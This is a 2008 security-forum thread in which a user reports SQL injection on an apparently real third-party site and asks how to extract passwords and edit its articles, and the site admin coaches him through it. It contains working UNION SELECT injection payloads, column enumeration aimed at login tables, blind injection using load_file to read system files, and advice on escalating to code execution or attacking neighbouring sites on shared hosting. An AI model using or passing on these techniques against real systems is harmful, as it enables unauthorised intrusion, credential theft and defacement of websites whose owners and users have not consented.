 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
pro in SQL injection ?? |
 |
 Posted: Fri Jan 25, 2008 11:50 am |
 |
|
| nox |
| Advanced user |
 |
|
| Joined: Dec 29, 2007 |
| Posts: 100 |
| Location: c://windows/system32 |
|
|
 |
|
 |
|
 Hi
i find exploit SQl injection ,where i go to INFORMATION_SCHEMA.TABLES
I find all table db :
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article
article_type
author
cricket_results
date
general
inv_tips
last_ping
mailing_list
m_type
mbb
poll
poll_data
dt_1
test1
when i put : FROM article
i find all Articles ID
but when i put : FROM USER_PRIVILEGES
Query failed == 1146: Table 'marketviews2.USER_PRIVILEGES' doesn't exist
plz Help me ?  |
|
_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::.. |
|
|
|
|
|
|
|
| Posted: Fri Jan 25, 2008 5:26 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
You see all table names from all databases you have currently access. So those tables are coming from at least 2 databases: "INFORMATION_SCHEMA" and "marketviews2". Table "USER_PRIVILEGES" is residing in "INFORMATION_SCHEMA" database, not in your current database.
In your specific case, all UPPERCASE tables seems to be coming from "INFORMATION_SCHEMA" and lowercase tables are in current database.
So "USER_PRIVILEGES" can be accessed as "INFORMATION_SCHEMA.USER_PRIVILEGES" |
|
|
|
|
|
|
|
|
| Posted: Sat Jan 26, 2008 10:31 am |
|
|
| nox |
| Advanced user |
|
|
| Joined: Dec 29, 2007 |
| Posts: 100 |
| Location: c://windows/system32 |
|
|
|
|
|
|
THankx  Work 100% , but i can't find name of pass & User
look here :
from information_schema.TABLES
| Code: | CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article
article_type
author
cricket_results
date
general
inv_tips
last_ping
mailing_list
msn_type
msnbb
poll
poll_data
dt_1
test1 |
mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL | USAGE | NO |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)
| Code: | | /article.phpID=-999 UNION SELECT 0,GRANTEE,2,3,4,5,6,7,8,IS_GRANTABLE FROM information_schema.USER_PRIVILEGES; |
i find : 'KK1'@'%' and NO
PLZ how i can find PASSWORD ?????
Look here plz : http://www.xfocus.net/articles/200601/847.html
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| VIEWS |
| USER_PRIVILEGES |
+---------------------------------------+
16 rows in set (0.17 sec)
mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL | USAGE | NO |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)
mysql> select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.STATIS
TICS;
+--------------+------------+-------------+
| TABLE_SCHEMA | TABLE_NAME | COLUMN_NAME |
+--------------+------------+-------------+
| in | article | articleid |
| in | user | userid |
+--------------+------------+-------------+
2 rows in set (0.02 sec)
D:\mysql5\bin>mysql -uroot -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.18
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use in
Database changed
mysql> delimiter //
mysql> CREATE PROCEDURE test(id INT)
-> BEGIN
-> SELECT * FROM in.USER WHERE USERID=ID;
-> END//
Query OK, 0 rows affected (0.08 sec)
mysql> delimiter ;
mysql> call test(1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
a¡¢SQL Injection
mysql> call test(1 and 1=1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.01 sec)
mysql> call test(1 and 1=2);
Empty set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
mysql> grant SELECT, INSERT, UPDATE, DELETE, EXECUTE
-> ON `IN`.*
-> TO 'KK1'@'%'
-> IDENTIFIED BY 'OBSCURE';
Query OK, 0 rows affected (0.03 sec)
SELECT, INSERT, UPDATE, DELETE, EXECUTEÈ
D:\mysql5\bin>mysql -uKK1 -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5 to server version: 5.0.18
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select ROUTINE_SCHEMA,ROUTINE_NAME,DEFINER,ROUTINE_DEFINITION from inform
ation_schema.ROUTINES;
+----------------+--------------+----------------+--------------------+
| ROUTINE_SCHEMA | ROUTINE_NAME | DEFINER | ROUTINE_DEFINITION |
+----------------+--------------+----------------+--------------------+
| in | test | root@localhost | |
| in | tt | root@localhost | |
+----------------+--------------+----------------+--------------------+
2 rows in set (0.01 sec)
mysql> call in.test(1 and length(load_file('c:/boot.ini'))>0);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.01 sec)
mysql> call in.test(1 and length(load_file('c:/boot.ini'))<0);
Empty set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
HELP ME WARAXE PLZ |
|
_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::.. |
|
|
|
|
|
|
|
| Posted: Sat Jan 26, 2008 1:28 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
I don't think, that you will find any names or passwords in "INFORMATION_SCHEMA". Next move can be COLUMNS enumeration.
| Code: |
/article.phpID=-1 UNION ALL SELECT 0,TABLE_NAME,2,3,4,5,6,7,8,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS;
|
Then search for tablenames and column names, which seems to be related with web application auth - anything like "user", "pass", "admin", "login", "account", "email", "editor", "customer", ... |
|
|
|
|
|
|
|
|
| Posted: Sat Jan 26, 2008 1:33 pm |
|
|
| nox |
| Advanced user |
|
|
| Joined: Dec 29, 2007 |
| Posts: 100 |
| Location: c://windows/system32 |
|
|
|
|
|
|
ok , i dont find password , now i want to Edit article.php
command UPDATE ?
/UNION SELECT 0,1,2,3,4,5,6,7 FROM article--
it work 
ALL Column name of Article : title,.....
article:id
article:title
article:author_id
article:date_id
article:add_date
article:edit_date
article:intro
article:body
article:sort
article:link
article:image
article:type
article:status
article:sn_type
article:sn_status
Now tell me how i can Edit Article [ HTML ] UPDATE
thankx for all waraxe |
|
_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::.. |
|
|
|
|
|
|
|
| Posted: Sat Jan 26, 2008 1:44 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
It's MySql 5.x, right ??
Then you can't use multiple queries in sql injection. Database modification can be done only with other methods:
1. Find sql injection in UPDATE query, which handles right table
2. Get php level access and execute your own sql queries
3. Find out database credentials and if port 3306 is open to world, try to manipulate database remotely (in most cases impossible, becasue MySql port usually is not open outside the internal network perimeter)
4. If web application has admin/editor backend interface, try to log in and make needed changes. Or elevate privileges from webapp admin/editor/author/moderator/etc to php code execution and then use your own sql queries.
5. If website is located in shared hosting server, then look for neighbour websites on same server and try to find weakest link in order to get access to server. If hosting server security measures are not tight enough, then you may be able to get access to all other website's files and databases ... |
|
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 85
Members: 0
Total: 85
